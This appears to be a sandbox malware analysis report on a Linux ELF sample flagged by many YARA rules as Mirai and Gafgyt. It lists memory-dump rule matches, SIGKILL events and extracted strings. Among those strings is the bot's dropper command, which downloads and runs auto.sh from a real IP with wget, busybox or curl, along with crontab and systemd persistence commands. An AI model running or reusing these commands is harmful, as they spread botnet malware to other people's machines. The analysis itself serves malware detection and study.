Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown

Source: Initial sample	String containing 'busybox' found: busybox
Source: Initial sample	String containing 'busybox' found: cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd / \|\| cd /home; wget http://154.216.18.192/auto.sh \|\| busybox wget http://154.216.18.192/auto.sh \|\| curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: Initial sample	String containing 'busybox' found: G%s/%s/proc//proc/%s/cmdlinewgetcurlnetstatgreppsbusyboxlsmvechokillkillallbashrebootshutdownhaltiptablespowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe/mnt/root/dev/null/dev/console/var/wwwsystemctl daemon-reload/tmp/current_crontabcrontab %s/tmp/crontabXXXXXX@reboot %s
Source: Initial sample	String containing 'busybox' found: systemctl enable startup_command.servicecrontab -l > /tmp/current_crontab 2>/dev/nullcd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd / \|\| cd /home; wget http://154.216.18.192/auto.sh \|\| busybox wget http://154.216.18.192/auto.sh \|\| curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh %s

Source: ELF static info symbol of initial sample

.symtab present: no

Source: /tmp/i586.elf (PID: 6266)	SIGKILL sent: pid: 721, result: successful	Jump to behavior
Source: /tmp/i586.elf (PID: 6266)	SIGKILL sent: pid: 904, result: successful	Jump to behavior
Source: /tmp/i586.elf (PID: 6266)	SIGKILL sent: pid: 912, result: successful	Jump to behavior
Source: /tmp/i586.elf (PID: 6266)	SIGKILL sent: pid: 918, result: successful	Jump to behavior
Source: /tmp/i586.elf (PID: 6266)	SIGKILL sent: pid: 936, result: successful	Jump to behavior
Source: /tmp/i586.elf (PID: 6266)	SIGKILL sent: pid: 1601, result: successful	Jump to behavior
Source: /tmp/i586.elf (PID: 6266)	SIGKILL sent: pid: 1638, result: successful	Jump to behavior
Source: /tmp/i586.elf (PID: 6266)	SIGKILL sent: pid: 1877, result: successful	Jump to behavior
Source: /tmp/i586.elf (PID: 6266)	SIGKILL sent: pid: 6295, result: successful	Jump to behavior

Source: i586.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: i586.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: i586.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: i586.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: i586.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: i586.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: i586.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
